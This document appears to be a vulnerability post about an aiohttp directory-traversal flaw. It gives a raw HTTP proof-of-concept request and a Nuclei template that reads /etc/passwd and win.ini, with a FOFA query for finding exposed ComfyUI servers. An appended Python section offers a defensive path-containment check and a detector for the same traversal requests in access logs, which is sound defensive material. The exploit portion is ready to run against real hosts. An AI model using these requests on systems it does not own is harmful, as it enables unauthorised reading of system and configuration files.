```http
GET /static/../../../../../etc/passwd HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
```

[Nuclei PoC verification]

```yaml
id: aiohttp-File-reading

info:
  name: aiohttp 存在目录遍历漏洞
  author: XLYCr.茶冉
  severity: high
  description: aiohttp 存在目录遍历漏洞,攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
  reference:
  metadata:
    verified: true
    max-request: 1
    fofa-query: title=="ComfyUI"
  tags: File reading

requests:
  - raw:
      - |
        GET /static/../../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
        Connection: close
        Accept: */*
        Accept-Language: en
        Accept-Encoding: gzip

      - |
        GET /static/../../../../../../Windows/win.ini HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
        Connection: close
        Accept: */*
        Accept-Language: en
        Accept-Encoding: gzip

    matchers-condition: or
    matchers:
      - type: word
        words:
          - "root:x:0:0:"
          - "[fonts]"
        part: body
```

Last modified: 9 March 2024
© Reproduction permitted with attribution
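As an added defender-side example (not part of the original post and not the aiohttp project's own code), the following Python shows the containment check a static-file handler should apply to the request paths used in the PoC above, plus a detection pass over constructed access-log request lines. The `/static/` prefix and the `/srv/app/static` root directory are assumptions.

```python
import posixpath
import re
from typing import Optional
from urllib.parse import unquote

# Assumed values for this example: the URL prefix served by the static route
# and the directory it is mapped to on disk.
STATIC_PREFIX = "/static/"
STATIC_ROOT = "/srv/app/static"

def resolve_static(request_path: str) -> Optional[str]:
    """Map a request path under /static/ onto a file path inside STATIC_ROOT.

    Returns None when the path is outside the static route or when, after
    percent-decoding and lexical normalisation, it would resolve to a file
    outside the root (the traversal pattern shown in the PoC above).
    """
    path = unquote(request_path.split("?", 1)[0])
    if not path.startswith(STATIC_PREFIX):
        return None
    rel = path[len(STATIC_PREFIX):]
    # Collapse "." and ".." segments the way the filesystem would.
    joined = posixpath.normpath(posixpath.join(STATIC_ROOT, rel))
    # Anything not at or below the root has escaped via ".." and is refused.
    if joined != STATIC_ROOT and not joined.startswith(STATIC_ROOT + "/"):
        return None
    return joined

# A ".." path segment anywhere in the decoded request target.
TRAVERSAL_SEGMENT = re.compile(r"(^|/)\.\.(/|$)")

def is_traversal_attempt(request_line: str) -> bool:
    """Flag an access-log request line whose decoded path has a '..' segment."""
    parts = request_line.split(" ")
    if len(parts) != 3:
        return False
    target = unquote(parts[1].split("?", 1)[0])
    return TRAVERSAL_SEGMENT.search(target) is not None

# Constructed sample request lines: the two paths from the PoC and one normal asset.
SAMPLE_REQUEST_LINES = [
    "GET /static/../../../../../../etc/passwd HTTP/1.1",
    "GET /static/../../../../../../Windows/win.ini HTTP/1.1",
    "GET /static/css/site.css HTTP/1.1",
]

def flagged_requests(lines=SAMPLE_REQUEST_LINES):
    """Return the request lines that the detection check would alert on."""
    return [line for line in lines if is_traversal_attempt(line)]
```

The resolver refuses both PoC paths and serves the legitimate asset; the log check flags the same two lines.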